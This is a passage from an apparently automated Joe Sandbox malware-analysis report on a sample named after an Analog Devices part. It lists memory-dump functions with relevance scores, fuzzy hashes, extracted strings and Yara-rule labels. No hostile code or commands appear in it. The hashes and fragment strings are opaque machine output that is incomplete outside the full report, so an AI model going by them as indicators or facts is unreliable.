Opcode Fuzzy Hash: bc28437e9d53a8f8978c4b0e6b9a89b62741dc1221d10c7dbde185262855a200
Instruction Fuzzy Hash: 27711674E2120ADFCB08CF99C5809AEFBB2FB88711F10852AD515B7714D374AA91CF94

Function 01335788 Relevance: 1.4, Strings: 1, Instructions: 167COMMON

Download Yara Rule

Strings

j0k, xrefs: 01335924

Memory Dump Source

Source File: 00000000.00000002.1836309965.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1330000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID: j0k
API String ID: 0-1798947235
Opcode ID: 1538dd4444c31a5b4c3e4a7ccfc5c74ee580d3e3e25fd0ef0b0d5e737173bd02
Instruction ID: 4c626719841ca86ec48071cc9211aa8b2b97beb042544f047ffbcf6a0e8125a1
Opcode Fuzzy Hash: 1538dd4444c31a5b4c3e4a7ccfc5c74ee580d3e3e25fd0ef0b0d5e737173bd02
Instruction Fuzzy Hash: 3261E174E15209DFCB04CFAAC5809DEFBF6FF89214F24942AD415BB224D7349A418B68

Function 01335779 Relevance: 1.4, Strings: 1, Instructions: 166COMMON

Download Yara Rule

Strings

j0k, xrefs: 01335924

Memory Dump Source

Source File: 00000000.00000002.1836309965.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1330000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID: j0k
API String ID: 0-1798947235
Opcode ID: 19d4f859c2a518d2cf081b881fdf11af80a93ed92bd23af20fb17fcc9981ca6f
Instruction ID: 92778ce49063b8c4f44b4cba6f31930fb3d6af1cdb40362ad097770de6000d5d
Opcode Fuzzy Hash: 19d4f859c2a518d2cf081b881fdf11af80a93ed92bd23af20fb17fcc9981ca6f
Instruction Fuzzy Hash: CF610474E15609CFCB04CFAAC5809EEFBF2FF89214F24946AD405BB264D3349A41CB68

Function 0B245CC0 Relevance: 1.4, Strings: 1, Instructions: 112COMMON

Download Yara Rule

Strings

i#)6, xrefs: 0B245D51

Memory Dump Source

Source File: 00000000.00000002.1857064657.000000000B240000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B240000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b240000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID: i#)6
API String ID: 0-3600651614
Opcode ID: 7a01a5cfc02ff4a66eeb0f4e053b490d5e71e35a588239fbe92fcf42cf88a670
Instruction ID: 87c2b479fa4f77a9cc9a14c4fa3df0987e498209c446b25560c3d98972fff94c
Opcode Fuzzy Hash: 7a01a5cfc02ff4a66eeb0f4e053b490d5e71e35a588239fbe92fcf42cf88a670
Instruction Fuzzy Hash: 4B412AB0E2620ADBCB08CFA6C5856AEFBF1EF99700F20D42AC055A7254D3749A458F95

Function 0B24ED90 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1857064657.000000000B240000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B240000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b240000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 400ff9e5466df8509d783bd8c0d980eb035a5c721ed85844b644e3c223b21899
Instruction ID: 95d71b49852e37424a703aec70ab1e572fa93792ac0b9728e37e570d82a62aa6
Opcode Fuzzy Hash: 400ff9e5466df8509d783bd8c0d980eb035a5c721ed85844b644e3c223b21899
Instruction Fuzzy Hash: DCE1C874E101198FDB14DFA9C5809AEBBF2FF89304F248169D818AB755D730AD82CF61

Function 0B24F1C8 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1857064657.000000000B240000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B240000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b240000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 70fbdbcf4719dbe88859a7e6cfb04eaed07e4909682774a3cf5b6a79b84893fd
Instruction ID: 7cdadb6aee59c1842633e0cd3a78806e94cf5fd79699ddd119036a4779f6d864
Opcode Fuzzy Hash: 70fbdbcf4719dbe88859a7e6cfb04eaed07e4909682774a3cf5b6a79b84893fd
Instruction Fuzzy Hash: D4E1D674E141598FDB14CFA9C6809AEBBF2FF89304F248169D818AB755D730AD82CF61

Function 0B24F600 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1857064657.000000000B240000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B240000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b240000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2ae8ec01a0df5e585a022eb07b0db3eb9973a350d92f534d65048cd0fbd0b8dc
Instruction ID: 4ad80ceae3f3b4f3dae6bcc64e9e1b0e9b1e371ba83046e207d3814294c0c15b
Opcode Fuzzy Hash: 2ae8ec01a0df5e585a022eb07b0db3eb9973a350d92f534d65048cd0fbd0b8dc
Instruction Fuzzy Hash: 9CE1E674E101198FDB14CFA9C6909AEBBF2FF89304F248169D818AB755D734AD82CF61

Function 09CD08F8 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1856859677.0000000009CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09CD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9cd0000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 322030aa4b4cf9f2ec4b8cf6667584531650ba8ccce35c96e81dcb60f76df186
Instruction ID: a3927ddf9b96669080783bc6bcc0be2dacaac08fb3243350537fe5988045a8cf
Opcode Fuzzy Hash: 322030aa4b4cf9f2ec4b8cf6667584531650ba8ccce35c96e81dcb60f76df186
Instruction Fuzzy Hash: ABE1F574E051198FDB14DFA9D5809AEBBF2FF88304F248169D914AB356D730AD82CFA1

Function 09CD04C0 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1856859677.0000000009CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09CD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9cd0000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7bb13bbe4af7d34ef4bf81f401a0e211014b9f7944a3c4e5c6a5cae939b7d309
Instruction ID: 7fd4c148bbbdaab05a4c659b1a451fa4387076afea067bd3f65b6854e8b21fc0
Opcode Fuzzy Hash: 7bb13bbe4af7d34ef4bf81f401a0e211014b9f7944a3c4e5c6a5cae939b7d309
Instruction Fuzzy Hash: 10E1E774E051198FDB14CFA9D5909AEBBF2FF89304F248169E914AB355D730AD82CFA0

Function 051FB730 Relevance: .3, Instructions: 288COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1844686344.00000000051F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_51f0000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ba132b678c9e6f4d9d59b336d27ce604391588654db853f87878eb8c171ba54a
Instruction ID: 0d17d5ca9bde45e712434e600f80dca6604f2648f15e9f668b869f37ff451144
Opcode Fuzzy Hash: ba132b678c9e6f4d9d59b336d27ce604391588654db853f87878eb8c171ba54a
Instruction Fuzzy Hash: 22D14974E09219DFCB18DFA9D980AAEFBB2FF89300F2091A9D509AB355D7309941CF51

Function 051FB71F Relevance: .3, Instructions: 279COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1844686344.00000000051F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_51f0000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8559ce2824da959c94c327b56716c4112df3d1491941d2a98f7d2927b4b9af20
Instruction ID: 2935a37eacd2a82f99d32cdc45fd1f02915d83273b73fe72198e65a1fcd0ca7d
Opcode Fuzzy Hash: 8559ce2824da959c94c327b56716c4112df3d1491941d2a98f7d2927b4b9af20
Instruction Fuzzy Hash: 53C15A74E19219DFCB18DFA9C980AAEFBB2FF89300F2491A9D509AB355D7309941CF50

Function 051F549F Relevance: .3, Instructions: 269COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1844686344.00000000051F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_51f0000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d9018ee8b4bab9cf77b83b07de6fb621fac1cd206f86d84cb0b464c49424f2f6
Instruction ID: 91b32ab4d6af943eee0add765659ba93693d5de9729cf3d21cec89d11ea17f62
Opcode Fuzzy Hash: d9018ee8b4bab9cf77b83b07de6fb621fac1cd206f86d84cb0b464c49424f2f6
Instruction Fuzzy Hash: CCD10635D2065A8ADB00EB64D991AADB7B1FFD5340F10D79AE40937221EF706EC4CB82

Function 051F54B0 Relevance: .3, Instructions: 264COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1844686344.00000000051F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_51f0000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0813351f9aaaeacf601fab13b1d23536f996acca3bf1ef9f785bcedd35ccfa5d
Instruction ID: 65a20d23585b424b6a1cc47c5571cc906a46f67c76f68a70250d36796d141840
Opcode Fuzzy Hash: 0813351f9aaaeacf601fab13b1d23536f996acca3bf1ef9f785bcedd35ccfa5d
Instruction Fuzzy Hash: 9CD1F635D2065A8ADB00EB64D991AADB7B1FFD5340F10D79AE50977220EF706EC4CB82

Function 051F5FB0 Relevance: .2, Instructions: 192COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1844686344.00000000051F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_51f0000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a358f51f641552c86b066cb35ecc0d3fb8127548898f449ea700f53f4d7d582e
Instruction ID: 303e1a3dca427e00736d6a8b1293b4237b07f5d4c29a46b8f722c40405fcd01b
Opcode Fuzzy Hash: a358f51f641552c86b066cb35ecc0d3fb8127548898f449ea700f53f4d7d582e
Instruction Fuzzy Hash: CB815570E05209EFDB14CFA9C8449EEFBB2FF89300F14952AD519AB254D7389A46CF94

Function 051F5FC0 Relevance: .2, Instructions: 189COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1844686344.00000000051F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_51f0000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d036c1f8d65f76deddcb109e7ab07c615945d1be7ad4f3cd4d78f1c861b4b3c7
Instruction ID: ac8379920e28248611dd3dc8dca5d4543de7682f8395db7e3c81d5ef2d2aa625
Opcode Fuzzy Hash: d036c1f8d65f76deddcb109e7ab07c615945d1be7ad4f3cd4d78f1c861b4b3c7
Instruction Fuzzy Hash: 9F812470E05209EFDB14CFA9C9409EEFBB2FF89300F14952AD515AB254D7389A46CF94

Function 013342B9 Relevance: .2, Instructions: 175COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1836309965.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1330000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7b6424e070fc7fb4c5c0ed10a089ed838f121f21d570d39b192931ecd6ff5a17
Instruction ID: f8546bdb43cda3b6c5b48d7bde056f2e76bf5f70f9323b78c809422c95c7c8ea
Opcode Fuzzy Hash: 7b6424e070fc7fb4c5c0ed10a089ed838f121f21d570d39b192931ecd6ff5a17
Instruction Fuzzy Hash: DF71F074A15219CFCB44CFA9C5849AEFBF1FF89210F18856AE405EB725D334AA42CF54

Function 013342C8 Relevance: .2, Instructions: 174COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1836309965.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1330000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 08980c61deacba92be2550bb6aa703853189c14c28dda948c342883024678168
Instruction ID: 69ab80fb0c3a168cab64d8455d7f88af109ca51a65f4f5d2b07c554870b36d0f
Opcode Fuzzy Hash: 08980c61deacba92be2550bb6aa703853189c14c28dda948c342883024678168
Instruction Fuzzy Hash: 7981E174E14219CFCB44CFA9C58499EFBF1FF88224F289569E415AB724E334AA42CF54

Function 0B244DC8 Relevance: .2, Instructions: 167COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1857064657.000000000B240000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B240000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b240000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6f1c1145be8c00861c53a9a5308dc6112205a520e89dc63032882a55e7f77f26
Instruction ID: ada0150938af39d39165ca6b3c7af885a7e3bc4ab64e197b9df43f6a6608969e
Opcode Fuzzy Hash: 6f1c1145be8c00861c53a9a5308dc6112205a520e89dc63032882a55e7f77f26
Instruction Fuzzy Hash: 1F711974E25209CFCB18CF99D6805DEFBF2FF89210F24942AD525BB754D7309A428B64

Function 051F6488 Relevance: .2, Instructions: 164COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1844686344.00000000051F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_51f0000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5a54532510b4facffb067ccf873f760ccc83cafa523bfae2d451cc43d91807b3
Instruction ID: 5bc3bc47a3fd18d2e564f61e0c724f09c8896baeb19679fcd254fc257c9bebd3
Opcode Fuzzy Hash: 5a54532510b4facffb067ccf873f760ccc83cafa523bfae2d451cc43d91807b3
Instruction Fuzzy Hash: 68614974E06209DFCB08DFA9E5459AEFBB2FF89300F10942AE515B7268D7349A42CF50

Function 051F6498 Relevance: .2, Instructions: 163COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1844686344.00000000051F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_51f0000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e2f4cd613772766f8022312cf90ae8542e36d995697dcc1cc77b3eca26b7e8e2
Instruction ID: 3142f60c1a339f47e4a1f7a7a49c791845f08ec56e444b3a8360ca0aadbf3fc1
Opcode Fuzzy Hash: e2f4cd613772766f8022312cf90ae8542e36d995697dcc1cc77b3eca26b7e8e2
Instruction Fuzzy Hash: 3C615874E06209DFCB08DFA9E5459AEFBB2FF89300F10942AE515B7268D7349A42CF50

Function 0B244811 Relevance: .2, Instructions: 152COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1857064657.000000000B240000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B240000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b240000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bc92dfeeb28934c2a29210ffff3862e1d2190cc423f71600b356b368e1ee6215
Instruction ID: 77154c6d0a05c37e6179d682acecdc1e2d0fe3ce1303229fbc12fa9ee968ae21
Opcode Fuzzy Hash: bc92dfeeb28934c2a29210ffff3862e1d2190cc423f71600b356b368e1ee6215
Instruction Fuzzy Hash: 9A6115B0D242199FDB08DFAAD8806EEBBF1AF89700F14852AD425B7744DB349A41CF54

Function 0B24DE88 Relevance: .1, Instructions: 146COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1857064657.000000000B240000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B240000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b240000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dda32de0e4557919d87c78328c341d8990fcc08be05a4d64a414261f03d8e02c
Instruction ID: cf26a415cfa68916d122abedf88bc6b67e92967791f7d51a95b1b7988ffc2600
Opcode Fuzzy Hash: dda32de0e4557919d87c78328c341d8990fcc08be05a4d64a414261f03d8e02c
Instruction Fuzzy Hash: 68512474E29209DFCB18CFAAD8849EDBBF9AF89740F05902AE429A7651D3709941CF50

Function 051FC0E3 Relevance: .1, Instructions: 142COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1844686344.00000000051F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_51f0000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 34c9721922560ee395c20bcaca4afd5fbf017c0e655e6e4d175f01b833ff9991
Instruction ID: 35faa0dc011c1fb9f1957bee6be86e172477e0cb906a8937ebb2e33094f81495
Opcode Fuzzy Hash: 34c9721922560ee395c20bcaca4afd5fbf017c0e655e6e4d175f01b833ff9991
Instruction Fuzzy Hash: D9519431A0D3848FC716CB75D85099ABFF2AF86214F19C1ABD045DB266CB344D46DB91

Function 0B246460 Relevance: .1, Instructions: 135COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1857064657.000000000B240000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B240000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b240000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e4e3973d5767ed8c5fedfba9f8b2158c68f179076f116373852dee9acbeccac6
Instruction ID: 29ff1db29a5d3320555e3fd2d504c438e1a469494ba98785d8ff027528911ae7
Opcode Fuzzy Hash: e4e3973d5767ed8c5fedfba9f8b2158c68f179076f116373852dee9acbeccac6
Instruction Fuzzy Hash: 90512674D2521ACFCF19CFA6C4801EEFBF2EB8A601F10986AC525B6254D77896018F69

Function 09CD04B0 Relevance: .1, Instructions: 134COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1856859677.0000000009CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09CD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9cd0000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dda529db15656921efba55532b6bba1abe07eb0ed2c3a96792913133daa3b869
Instruction ID: 35cf5293988fff24ec46d8b0ec94d5045cb5548ec94a5aec4c7b71d3ebcf32c6
Opcode Fuzzy Hash: dda529db15656921efba55532b6bba1abe07eb0ed2c3a96792913133daa3b869
Instruction Fuzzy Hash: 9B51F874E052198FDB14CFA9D5805AEFBF2FF89304F248169D818AB215D7319982CF61

Function 09CD08E8 Relevance: .1, Instructions: 132COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1856859677.0000000009CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09CD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9cd0000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e8a2024d7fd283356ed798181fb20de7529edcb961317a2e5088066e75bcc56f
Instruction ID: 48e1732f949969fac3751512cc551a743d04dcde7464258651c1fd0f792c8bef
Opcode Fuzzy Hash: e8a2024d7fd283356ed798181fb20de7529edcb961317a2e5088066e75bcc56f
Instruction Fuzzy Hash: C8510B70E016198FDB14CFA9D5805AEFBF2FF89300F24816AD518A7256D7349A82CFA1

Function 013355A0 Relevance: .1, Instructions: 120COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1836309965.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1330000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ed9cf5019bef91fbf041148c2d0c75cde4268c5d5a94e1d11e393040b2f7f522
Instruction ID: 59e63a8116cef3d4bbfc38eb88c10eaa0a9b4f02f95bb965be15660d6ffcf8df
Opcode Fuzzy Hash: ed9cf5019bef91fbf041148c2d0c75cde4268c5d5a94e1d11e393040b2f7f522
Instruction Fuzzy Hash: 04510770E0520ACFDB08CFAAD5815AEFBF2BF89314F24D56AC416E7654D334AA428F54

Function 013355B0 Relevance: .1, Instructions: 119COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1836309965.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1330000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4d617685516480a585be3da53ad3152a97d786e977ad904cd7ab1045fe21477d
Instruction ID: ff4f4dd3afc142790d2c3061352652d5e737533d20a7abf1ba6706fe9638c6eb
Opcode Fuzzy Hash: 4d617685516480a585be3da53ad3152a97d786e977ad904cd7ab1045fe21477d
Instruction Fuzzy Hash: 8451F8B0E0460ADFDB08CFAAD5815AEFBF2BF88314F14D52AC516E7654D334A6418F98

Function 0B244BA8 Relevance: .1, Instructions: 107COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1857064657.000000000B240000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B240000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b240000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 966fc0bb9d090ccb05b227e1878606d8029bcd848fe6ed693dd344bb9428d4c3
Instruction ID: 1fa6ffd5ae88ce2ca7b7f1b82929e05f76089e26f295858a1e95783e419f7587
Opcode Fuzzy Hash: 966fc0bb9d090ccb05b227e1878606d8029bcd848fe6ed693dd344bb9428d4c3
Instruction Fuzzy Hash: 5341FA70D15609DBCB08DFAAC5816AEFBF2BF88300F24C16AC425B7754D7749A418F54

Function 013359F3 Relevance: .1, Instructions: 103COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1836309965.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1330000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6cdc0a26af31a366cb4931625b7dfb2c5e5a1491e1200754d5991f1080d0304c
Instruction ID: 4a5a5f96816d0be50b4d5ee6fd02a88d2f05750a66ed74d3b3cf882c75856625
Opcode Fuzzy Hash: 6cdc0a26af31a366cb4931625b7dfb2c5e5a1491e1200754d5991f1080d0304c
Instruction Fuzzy Hash: E04105B4E0524A9FDB05CFAAC5815AEFFF2BF88300F24C56AC505B7315D7349A829B94

Function 01335A00 Relevance: .1, Instructions: 102COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1836309965.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1330000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 807ee1121dafe9beb1ddbe6a37057a7b475bf49bcd2d4af63224fd3db1d6ba03
Instruction ID: ec9fd4b214b69838cf1afc57d08468e8cf4388226cb725c60cf81a1574a196d5
Opcode Fuzzy Hash: 807ee1121dafe9beb1ddbe6a37057a7b475bf49bcd2d4af63224fd3db1d6ba03
Instruction Fuzzy Hash: 5141F7B0E0520A9BDB04CFAAC5815AEFBF2FF88304F24D56AC515B7304D7349A819F94

Function 051F0950 Relevance: .1, Instructions: 80COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1844686344.00000000051F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_51f0000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7aac08919fc22f14b5518234af12ac6366553f90523e3980d10a53c7e5ac56e5
Instruction ID: 68d9af176ec0205d3d61ba652d2e7251485ca12f97e13319441f3038ddf3b562
Opcode Fuzzy Hash: 7aac08919fc22f14b5518234af12ac6366553f90523e3980d10a53c7e5ac56e5
Instruction Fuzzy Hash: 4B21A071E193548FD70ACF6A88146DEBFF27F89200F08C0ABD008A72A6D7385941CB92

Function 01333347 Relevance: .1, Instructions: 69COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1836309965.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1330000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: de7a35a61a22b754b68c8cdde2f7484b02575512e2f0fa57b92089d255dab2b8
Instruction ID: 7bbaf15e254dd6ea6f6fd7cdd35a7a1ed790f7b72009880b01782f30470b6f45
Opcode Fuzzy Hash: de7a35a61a22b754b68c8cdde2f7484b02575512e2f0fa57b92089d255dab2b8
Instruction Fuzzy Hash: F521DE35824665DFCB62CF35C0D5A8277B1FF5B71832999CDD4818E828D736A811CF46

Function 0B240E18 Relevance: 12.7, Strings: 10, Instructions: 196COMMON

Download Yara Rule

Strings

65, xrefs: 0B240FC2
<|1, xrefs: 0B240F2A
.35, xrefs: 0B240E98
.35, xrefs: 0B240EE4
.35, xrefs: 0B240F0A
.35, xrefs: 0B240E72
.35, xrefs: 0B240E4C
<|1, xrefs: 0B241006
.35, xrefs: 0B240F9C
.35, xrefs: 0B240EBE

Memory Dump Source

Source File: 00000000.00000002.1857064657.000000000B240000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B240000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b240000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID: 65$.35$.35$.35$.35$.35$.35$.35$<|1$<|1
API String ID: 0-489496926
Opcode ID: c5751e3d6d93d710267d9883b28d94a79a81c92511f60fba474c5f0212acdd24
Instruction ID: 1186ebe5343cbbe3ae3c9268d270a072355dbd464e6a2e0fdd71f0aa847fb92e
Opcode Fuzzy Hash: c5751e3d6d93d710267d9883b28d94a79a81c92511f60fba474c5f0212acdd24
Instruction Fuzzy Hash: F991A474E002098BDB14DBA8D581ADDBBF6FF88300F209659E515BB355DB30AE86CF91

Function 051F7170 Relevance: 7.8, Strings: 6, Instructions: 330COMMON

Download Yara Rule

Strings

d8kq, xrefs: 051F7620
(ofq, xrefs: 051F72C2
Hjq, xrefs: 051F7531
,jq, xrefs: 051F7294
,jq, xrefs: 051F7288
(ofq, xrefs: 051F72B6

Memory Dump Source

Source File: 00000000.00000002.1844686344.00000000051F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_51f0000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID: (ofq$(ofq$,jq$,jq$Hjq$d8kq
API String ID: 0-1895196648
Opcode ID: b75ee092cf582aa9ffe9a9f26c6494c6a755764e9030c17a74365b44ee246bf9
Instruction ID: 3c3d7ec76add5efef5571c4cce67f7e1024d25b3f9a81a050cac75f3ee86e2db
Opcode Fuzzy Hash: b75ee092cf582aa9ffe9a9f26c6494c6a755764e9030c17a74365b44ee246bf9
Instruction Fuzzy Hash: 0DC12B70B001199FCB54DFA8D954AAE7BF6FF88750F158069EA06A73E1DB349C41CBA0

